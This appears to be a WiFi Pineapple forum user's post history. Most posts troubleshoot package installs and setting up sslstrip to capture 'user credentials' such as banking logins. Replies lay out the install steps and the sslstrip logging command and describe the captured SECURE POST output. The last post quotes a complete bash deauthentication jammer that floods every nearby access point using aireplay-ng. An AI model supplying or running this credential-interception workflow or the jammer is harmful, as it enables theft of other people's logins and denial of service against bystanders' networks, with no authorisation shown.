Jump to content

abxy007

Active Members
  • Posts

    49
  • Joined

  • Last visited

Posts posted by abxy007

  1. opkg install reaver

    Unknown package 'reaver'.

    Collected errors:

    * opkg_install_cmd: Cannot install package reaver.

    root@Pineapple:~# opkg install reaver

    Unknown package 'reaver'.

    Collected errors:

    * opkg_install_cmd: Cannot install package reaver.

    root@Pineapple:~# Unknown package 'reaver'.

    -ash: Unknown: not found

    root@Pineapple:~# Collected errors:

    -ash: Collected: not found

    root@Pineapple:~# * opkg_install_cmd: Cannot install package reaver.

    -ash: *: not found

    root@Pineapple:~# opkg install reaver

    Collected errors:

    * opkg_install_cmd: Cannot install package reaver.

    root@Pineapple:~# opkg install reaver

    Unknown package 'reaver'.

    Collected errors:

    * opkg_install_cmd: Cannot install package reaver.

    root@Pineapple:~# Unknown package 'reaver'.

    -ash: Unknown: not found

    help?

  2. I now have sslstrip configured and working. I see the "post " function in the log but what I dont see is any "user credentials". I even logged in with my own banking info and nothing happened. Am I doing something wrong?

    Thanks again for all your help!!!

  3. Seems to be correct to me as you captured some POST data.

    By the way, I sent a new version to Seb to prevent the module to be started if ssltrip program is not installed first :)

    So i dont have to enter in any iptables stuff at all for recording secure data?

  4. ok here is what you do

    #1 set up your thumb drive according to the guide found here in these forums.

    #2 with ics working ssh in and issue

    opkg update
    opkg --dest usb install sslstrip
    

    #3 install Whistle Master's module sslstrip internal or usb

    #4 just run it within the module from now on

    thanks heres what i got

    2012-06-05 10:42:23,853 POST Data (su.ff.avast.com):
    
    !xœsJLQJ-,M-.nts.google.com):
    goog-malware-shavar;a:70649-80675:s:76801-86262:mac
    goog-phish-shavar;a:210081-215756:s:98770-101489:mac
    goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
    goog-csdwhite-sha256;a:1-23:s:1:mac
    goog-downloadwhite-digest256;a:1-27:s:1-3:mac
    
    2012-06-05 12:27:50,055 POST Data (safebrowsing.clients.google.com):
    goog-malware-shavar;a:70656-80677:s:76801-86263:mac
    goog-phish-shavar;a:210081-215761:s:98770-101494:mac
    goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
    goog-csdwhite-sha256;a:1-23:s:1:mac
    goog-downloadwhite-digest256;a:1-27:s:1-3:mac
    

    does this look right

  5. the easy way would be to use Whistle Master's module sslstrip, it configures everything needed, other than installing sslstrip to the usb
    thanks for the info let me get this right

    1 install sslstrip module to pineapple instead if usb

    2 run module (forwards logs first)

    3 issue iptables command crap

    4 watch the magic

    does that sum it up in a nutshell?

  6. What command are you running for sslstrip? Just sslstrip without any switches?

    You will want to issue the iptables command above, then "sslstrip -w /usb/sslstrip.log" or something to that effect, you will see nothing on the console command for sslstrip it will all be contained in the log file. Then try logging into your bank, it works, you should see:

    "{DATE} {TIME} SECURE POST Data ({WEBSITE}):{DATA STREAM}"

    I AM RUNNING FIRMWARE 2.1.0....DO I NEED TO RUN THE COMMAND "sslstrip -w /usb/sslstrip.log" ALSO, WHEN DO I ADD THE IPTABLES COMMAND...BEFORE I START SSLSTRIP OR AFTER?

  7. Users in the following thread are having the same problem. I am one of them.

    Could Not Access Web Interface

    I think i got it working because now, I have a Log file on my usb drive.

    2012-06-05 10:42:23,853 POST Data (su.ff.avast.com):
    
    !xœsJLQJ-,M-.nts.google.com):
    goog-malware-shavar;a:70649-80675:s:76801-86262:mac
    goog-phish-shavar;a:210081-215756:s:98770-101489:mac
    goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
    goog-csdwhite-sha256;a:1-23:s:1:mac
    goog-downloadwhite-digest256;a:1-27:s:1-3:mac
    
    2012-06-05 12:27:50,055 POST Data (safebrowsing.clients.google.com):
    goog-malware-shavar;a:70656-80677:s:76801-86263:mac
    goog-phish-shavar;a:210081-215761:s:98770-101494:mac
    goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
    goog-csdwhite-sha256;a:1-23:s:1:mac
    goog-downloadwhite-digest256;a:1-27:s:1-3:mac

    It this correct ?

  8. got usb swap setup on a 2 gb card

    this is what is says when i type free in the command prompt

    Executing: free
    total used free shared buffers
    Mem: 29524 23568 5956 0 1584
    -/+ buffers: 21984 7540
    Swap: 531212 564 530648

    Verififed that usb swap has been enabled.....When I run sslstrip, i see a log file but when I try to get back to the web interface, i cant. It says pineapple not found (Firefox can't establish a connection to the server at 172.16.42.1.)

  9. me too!!!

    Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/pineapple/modules.php on line 92

    Warning: file_get_contents(http://cloud.wifipineapple.com/mk4/downloads.php?moduleList) [function.file-get-contents]: failed to open stream: Address family not supported by protocol in /www/pineapple/modules.php on line 92

    Module Version Author Description

  10. this is my jammer code, works nicely.. :)

    
    #!/bin/bash                                                      
    
    INTERFACE=wlan0
    MON_INTERFACE=mon.wlan0
    AMOUNT=10000
    
    if [ "$#" -ne "1" ]; then  
    	echo "Jammer:"
    	echo "usage: ./jam.sh [ start | stop ]"
    	exit 0
    fi
    
    if [ "$1" == "start" ]
    then
    
    killall aireplay-ng 2> /dev/null &
    killall aireplay-ng 2> /dev/null &
    killall aireplay-ng 2> /dev/null &
    
    ifconfig $INTERFACE down
    ifconfig $INTERFACE up                                                            
    
    for i in `iwlist $INTERFACE scan | grep Address | sed 's/^ *//g' | cut -d" " -f5`; do
    	echo "Jamming ${i}" 
    	aireplay-ng -0 $AMOUNT --ignore-negative-one -D -a ${i} $MON_INTERFACE &
    done
    
    fi
    
    if [ "$1" == "stop" ]
    then
    
    killall aireplay-ng 2> /dev/null &
    killall aireplay-ng 2> /dev/null &
    killall aireplay-ng 2> /dev/null &                              
    
    echo "disabled"
    fi
    
    
    

    how do i set up your code?

×
×
  • Create New...